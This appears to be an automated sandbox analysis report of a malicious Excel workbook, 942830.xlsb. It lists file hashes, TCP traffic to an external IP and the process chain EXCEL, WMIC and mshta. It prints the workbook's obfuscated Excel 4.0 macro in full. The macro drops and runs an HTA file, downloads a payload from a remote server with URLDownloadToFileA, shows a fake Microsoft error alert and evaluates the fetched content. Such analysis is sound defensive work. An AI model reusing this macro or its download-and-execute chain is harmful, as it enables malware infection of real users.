                                                        Preview: .PNG........IHDR.......<......i....VIDATx...{PT.........Y...4.(.C^".y....4.X....G..&N&M.D.h..N..k:QKe.b.h..K#uy..#J..Ke...e....n.8..eY)G...>..g...s...........B8..........RD./J.!.(E.....RD./J.!.(E.....RD./J.!.(E.....RD./J.!.(E.....RD./J.!.(E..x.=.N..5<.@z.N..P?...>...:].7..,y.P..:#f..5..e!ol....KKZoV..%i......{........&xx...8..q?......\B.l..=ju...)..|.......1.......V..V.K.^?.C........)..=.....z..(OM)..).k....@jTh......&.>.b.._..D....[T.y......<...{t....#.JYT..N...`eg.<...........<<.(..7..n...&/z..Y&...qt.Kx.....6.>.Hd9~.sPp...!k.?x."...D....}_....Oo.V.{......ee....Wl...-b...-.....[k.3Y}..XA.5. 6-&..5_/S...z....~f..I$.....cv....&S4...B...@U]....h|tV.*..:...k.^.3......M.........K.o........}.Y...{3s.Dbq....C...a..2.;....[.c5...`~.dL=..u..4.^....ea3.Uz.%...Bm..^.F....hUm..jUm.m..:Ah....]..i '.s..PU.......GG.V]o...:.X...;.t}}.k^./.k......6.c.4.0.1h...{.(;4D"..U.u.s./{.kk..{.H....6...................].^M........4?H2..du..l.......hV....@Q\...j..
                                                        C:\Users\user\Desktop\~$942830.xlsb
                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):165
                                                        Entropy (8bit):1.4377382811115937
                                                        Encrypted:false
                                                        SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                                                        MD5:797869BB881CFBCDAC2064F92B26E46F
                                                        SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                                                        SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                                                        SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                                                        Malicious:true
                                                        Reputation:high, very likely benign file
                                                        Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                                        Static File Info

                                                        General

                                                        File type:Microsoft Excel 2007+
                                                        Entropy (8bit):7.868859973268516
                                                        TrID:
                                                        • Excel Microsoft Office Open XML Format document with Macro (51004/1) 36.56%
                                                        • Microsoft Excel Office Binary workbook document (40504/1) 29.03%
                                                        • Excel Microsoft Office Open XML Format document (40004/1) 28.67%
                                                        • ZIP compressed archive (8000/1) 5.73%
                                                        File name:942830.xlsb
                                                        File size:71836
                                                        MD5:1d439288755abe01c8e0b84351a1adf3
                                                        SHA1:3db8730627a0fc4faa83e348e7e25d9ab9b81cb7
                                                        SHA256:72c5559bc575d4f5527babe24331374e5d319362e96e1078d35179aceea41941
                                                        SHA512:aa1f62a6a10d943c94a4be5c1cc367ababdff424c10477c8e9e6219eef8f6c48a03fdfb87220c4d093658a75378987f47b2060cc9efb24f8bd308bdd62947d6b
                                                        SSDEEP:1536:UWqPFwJpvc1e+BwT8YIbDMz+1d6xw9boBltlDSSs9cwTIgdUpm:VNMrbDu+1d6xw8PclcwTIgdUc
                                                        File Content Preview:PK..........!...l.....W.......[Content_Types].xml ...(.........................................................................................................................................................................................................

                                                        File Icon

                                                        Icon Hash:e4e2ea8aa4b4b4b4

                                                        Static OLE Info

                                                        General

                                                        Document Type:OpenXML
                                                        Number of OLE Files:1

                                                        OLE File "942830.xlsb"

                                                        Indicators

                                                        Has Summary Info:
                                                        Application Name:
                                                        Encrypted Document:
                                                        Contains Word Document Stream:
                                                        Contains Workbook/Book Stream:
                                                        Contains PowerPoint Document Stream:
                                                        Contains Visio Document Stream:
                                                        Contains ObjectPool Stream:
                                                        Flash Objects Count:
                                                        Contains VBA Macros:

                                                        Macro 4.0 Code

                                                        0,564,=FOPEN("C:\Pr" & CHAR(111) & "gr" & CHAR(97) & "" & CHAR(109) & "Data\EvbrPIaoQqom.rt" & CHAR(102), 3)
                                                        2,564,=D5533+A5223
                                                        7,564,=A1868+A1946
                                                        11,564,=C4380+C7586
                                                        14,564,=FOR.CELL("nWZNlHtei",Sheet1!CP164:CQ2658, TRUE)
                                                        18,564,=D406+B412
                                                        21,564,=C6005+A2349
                                                        24,564,=A3461+B2499
                                                        26,564,=C4960+D4106
                                                        28,564,=FWRITE(0,CHAR(nWZNlHtei))
                                                        29,564,=C7710+D2165
                                                        33,564,=D5791+B2710
                                                        36,564,=D5293+B4187
                                                        38,564,=A6864+D7860
                                                        41,564,=B2108+C5352
                                                        43,564,=NEXT()
                                                        46,564,=A6496+B938
                                                        49,564,=A7432+B2701
                                                        52,564,=B3899+C143
                                                        56,564,=EXEC("" & CHAR(119) & "mic process ca" & CHAR(108) & "l crea" & CHAR(116) & "e " & CHAR(34) & "mshta C:\" & CHAR(80) & "" & CHAR(114) & "ogramD" & CHAR(97) & "ta\EvbrPIaoQqo" & CHAR(109) & ".rt" & CHAR(102) & "" & CHAR(34))
                                                        57,564,=B2843+A6723
                                                        58,564,=A3582+A920
                                                        59,564,=D1982+B865
                                                        60,564,=D9843+D5758
                                                        62,564,=C3983+C5558
                                                        63,564,=D462+C451
                                                        64,564,=B2389+A5133
                                                        65,564,=C6094+D4523
                                                        67,564,=CALL("urlmo" & CHAR(110), "URL" & CHAR(68) & "" & CHAR(111) & "wnl" & CHAR(111) & "adT" & CHAR(111) & CHAR(70) & "ile" & CHAR(65) & "","JJCCJ" & CHAR(74), 0, "http:/" & CHAR(47) & CHAR(49) & "36." & CHAR(49) & "44.181.174" & CHAR(58) & "8080/Q2" & CHAR(87) & "5VWUFL5VCMQ" & CHAR(55) & "JQPETG3CCTYX72Z" & CHAR(52) & "R25PD" & CHAR(71) & "", CHAR(67) & CHAR(58) & "\Prog" & CHAR(114) & "amData\QxvEWFGZz" & CHAR(115) & "RaLpM.t" & CHAR(120) & "" & CHAR(116) & "",0,0)
                                                        68,564,=B104+D204
                                                        69,564,=C4475+D1420
                                                        70,564,=A5173+B9471
                                                        72,564,=B2468+C8962
                                                        73,564,=B787+A8188
                                                        75,564,=D9546+A9346
                                                        78,564,=A9437+A373
                                                        79,564,=ALERT("" & CHAR(69) & "rror!" & CHAR(32) & "Sending report t" & CHAR(111) & " Micr" & CHAR(111) & CHAR(115) & CHAR(111) & "ft...")
                                                        80,564,=C5802+A9247
                                                        81,564,=B3530+C368
                                                        82,564,=B8109+D333
                                                        85,564,=B4090+A7127
                                                        86,564,=C8119+A6624
                                                        87,564,=D2397+C8265
                                                        89,564,=A8846+D8758
                                                        90,564,=B685+D4928
                                                        91,564,=B5722+C3018
                                                        93,564,=D3313+C4267
                                                        94,564,=FOPEN("C:\ProgramD" & CHAR(97) & "ta\QxvEWFG" & CHAR(90) & "zsRaL" & CHAR(112) & "M.txt",1)
                                                        95,564,=D1625+C227
                                                        97,564,=B9659+B1121
                                                        98,564,=A2894+D6284
                                                        100,564,=D3434+B6016
                                                        101,564,=C3988+B997
                                                        102,564,=C532+D1116
                                                        105,564,=B2645+B3278
                                                        106,564,=C6165+B5381
                                                        107,564,=A6261+D3436
                                                        109,564,=SEND.MAIL(EVALUATE(FREAD(US95,255)))
                                                        110,564,=C2438+B4014
                                                        114,564,=C526+A7371
                                                        115,564,=D313+D3521
                                                        118,564,=A9077+C9331
                                                        119,564,=B1552+C4204
                                                        122,564,=RETURN()
                                                        

                                                        Network Behavior

                                                        Network Port Distribution

                                                        TCP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Nov 24, 2021 19:01:59.756293058 CET491678080192.168.2.22136.144.181.174
                                                        Nov 24, 2021 19:01:59.784006119 CET808049167136.144.181.174192.168.2.22
                                                        Nov 24, 2021 19:02:00.282386065 CET491678080192.168.2.22136.144.181.174
                                                        Nov 24, 2021 19:02:00.310106039 CET808049167136.144.181.174192.168.2.22
                                                        Nov 24, 2021 19:02:00.812792063 CET491678080192.168.2.22136.144.181.174
                                                        Nov 24, 2021 19:02:00.840646029 CET808049167136.144.181.174192.168.2.22
                                                        Nov 24, 2021 19:02:00.842485905 CET491688080192.168.2.22136.144.181.174
                                                        Nov 24, 2021 19:02:00.870201111 CET808049168136.144.181.174192.168.2.22
                                                        Nov 24, 2021 19:02:01.452440977 CET491688080192.168.2.22136.144.181.174
                                                        Nov 24, 2021 19:02:01.483283043 CET808049168136.144.181.174192.168.2.22
                                                        Nov 24, 2021 19:02:01.982955933 CET491688080192.168.2.22136.144.181.174
                                                        Nov 24, 2021 19:02:02.010921955 CET808049168136.144.181.174192.168.2.22

                                                        Code Manipulations

                                                        Statistics

                                                        Behavior

                                                        Click to jump to process

                                                        System Behavior

                                                        General

                                                        Start time:19:01:17
                                                        Start date:24/11/2021
                                                        Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                                        Imagebase:0x13f640000
                                                        File size:28253536 bytes
                                                        MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        General

                                                        Start time:19:01:40
                                                        Start date:24/11/2021
                                                        Path:C:\Windows\System32\wbem\WMIC.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:wmic process call create "mshta C:\ProgramData\EvbrPIaoQqom.rtf"
                                                        Imagebase:0xff440000
                                                        File size:566272 bytes
                                                        MD5 hash:FD902835DEAEF4091799287736F3A028
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate

                                                        General

                                                        Start time:19:01:42
                                                        Start date:24/11/2021
                                                        Path:C:\Windows\System32\mshta.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:mshta C:\ProgramData\EvbrPIaoQqom.rtf
                                                        Imagebase:0x13fa30000
                                                        File size:13824 bytes
                                                        MD5 hash:95828D670CFD3B16EE188168E083C3C5
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        Disassembly

                                                        Code Analysis

                                                        Reset < >